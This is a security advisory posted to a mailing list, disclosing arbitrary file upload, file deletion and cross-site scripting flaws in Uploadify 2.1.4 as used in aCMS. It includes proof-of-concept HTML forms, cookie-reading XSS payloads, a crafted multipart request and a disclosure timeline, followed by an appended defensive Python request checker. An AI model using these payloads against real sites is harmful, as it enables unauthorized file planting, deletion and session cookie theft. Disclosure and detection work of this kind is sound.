Hello list!
These are Arbitrary File Uploading, Arbitrary File Deletion and Cross-Site
Scripting vulnerabilities in Uploadify. Particularly in the version used in
aCMS (it looks like these developers use a modified version of Uploadify, but
other developers can also use such a version).
-------------------------
Affected products:
-------------------------
Vulnerable are Uploadify v2.1.4 and potentially other versions, particularly
the version in aCMS. Uploadify 3.x versions are not vulnerable.
----------
Details:
----------
Arbitrary File Uploading (WASC-31):
http://websecurity.com.ua/uploads/2013/Uploadify%20AFU.html
<body>
<form action="http://site/uploadify.php" method="post"
enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="/uploadify/">
<input type="submit" value="OK">
</form>
</body>
Arbitrary File Deletion (WASC-42):
http://websecurity.com.ua/uploads/2013/Uploadify%20AFD.html
<body>
<form action="http://site/uploadify.php" method="post"
enctype="multipart/form-data">
<input type="file" name="test">
<input type="hidden" name="newfile" value="/full/path/uploadify/1">
<input type="submit" value="OK">
</form>
</body>
Cross-Site Scripting (WASC-08):
http://websecurity.com.ua/uploads/2013/Uploadify%20XSS.html
<body>
<form action="http://site/uploadify.php" method="post"
enctype="multipart/form-data">
<input type="file" name="test">
<input type="hidden" name="newfile" value="<body
onload=alert(document.cookie)>">
<input type="submit" value="OK">
</form>
</body>
http://websecurity.com.ua/uploads/2013/Uploadify%20XSS-2.html
<body>
<form action="http://site/uploadify.php" method="post"
enctype="multipart/form-data">
<input type="file" name="Filedata">
<input type="hidden" name="folder" value="/uploadify">
<input type="submit" value="OK">
</form>
</body>
The second attack can be done on Linux/Unix systems, where angle brackets
can be used, or by spoofing headers.
With the following headers (to specify the XSS payload in the extension):
POST http://site/uploadify.php
-----------------------------240841995418756\r\n
Content-Disposition: form-data; name="Filedata"; filename="test.<body
onload=with(document)alert(cookie)>"\r\n
Content-Type: application/octet-stream\r\n
\r\n
test\r\n
\r\n
-----------------------------240841995418756\r\n
Content-Disposition: form-data; name="folder"\r\n
\r\n
/uploadify\r\n
-----------------------------240841995418756--\r\n
------------
Timeline:
------------
2013.03.04 - informed developers of aCMS about part of the vulnerabilities.
2013.04.03 - informed developers of aCMS about another part of the
vulnerabilities.
2013.04.07 - informed developers of aCMS about another part of the
vulnerabilities.
2013.05.25 - informed developers of aCMS about another part of the
vulnerabilities.
2013.05.26 - informed developers of aCMS about another part of the
vulnerabilities.
In all cases the developers just ignored all messages via different e-mails
and the contact form.
2013.06.12 - announced at my site.
2013.06.22 - informed developers of Uploadify.
2013.09.12 - disclosed at my site (http://websecurity.com.ua/6566/).
Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua
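
As an added defensive example (not part of the original advisory, and not Uploadify or aCMS code), the Python check below inspects a multipart POST addressed to uploadify.php for the request shapes listed under Details: markup in the filename or in a field value, a client-supplied newfile field, and a folder or extension outside an allowlist. The allowlist values, the finding names and the build_body helper that constructs the sample input are assumptions made for this illustration.

```python
from email import message_from_bytes
from pathlib import PurePosixPath

# Assumed site policy (hypothetical values, not from Uploadify or aCMS).
ALLOWED_FOLDERS = {"/uploads/images"}
ALLOWED_EXTENSIONS = {".jpg", ".png", ".gif"}
BOUNDARY = "constructedboundary"
CONTENT_TYPE = "multipart/form-data; boundary=" + BOUNDARY


def build_body(fields, filename):
    """Build a constructed multipart body (sample input for this example)."""
    parts = ['Content-Disposition: form-data; name="Filedata"; '
             f'filename="{filename}"\r\n'
             "Content-Type: application/octet-stream\r\n\r\ntest\r\n"]
    for name, value in fields.items():
        parts.append(f'Content-Disposition: form-data; name="{name}"\r\n\r\n{value}\r\n')
    sep = f"--{BOUNDARY}\r\n"
    return (sep + sep.join(parts) + f"--{BOUNDARY}--\r\n").encode()


def inspect_upload(content_type, body):
    """Return finding codes for one multipart POST addressed to uploadify.php."""
    msg = message_from_bytes(b"Content-Type: " + content_type.encode() + b"\r\n\r\n" + body)
    if not msg.is_multipart():
        return ["not-multipart"]
    findings = []
    for part in msg.get_payload():
        name = part.get_param("name", header="content-disposition") or ""
        filename = part.get_param("filename", header="content-disposition", unquote=False)
        if filename is not None:
            filename = str(filename).strip('"')  # keep any angle brackets intact
            if "<" in filename or ">" in filename:
                findings.append("markup-in-filename")
            if PurePosixPath(filename).suffix.lower() not in ALLOWED_EXTENSIONS:
                findings.append("extension-not-allowed")
            continue
        value = (part.get_payload(decode=True) or b"").decode("utf-8", "replace").strip()
        if "<" in value or ">" in value:
            findings.append("markup-in-" + name)
        if name == "newfile":
            findings.append("client-supplied-newfile")
        if name == "folder" and value.rstrip("/") not in ALLOWED_FOLDERS:
            findings.append("folder-not-allowed")
    return findings


if __name__ == "__main__":
    print(inspect_upload(CONTENT_TYPE, build_body({"folder": "/uploadify"}, "test.<b>")))
```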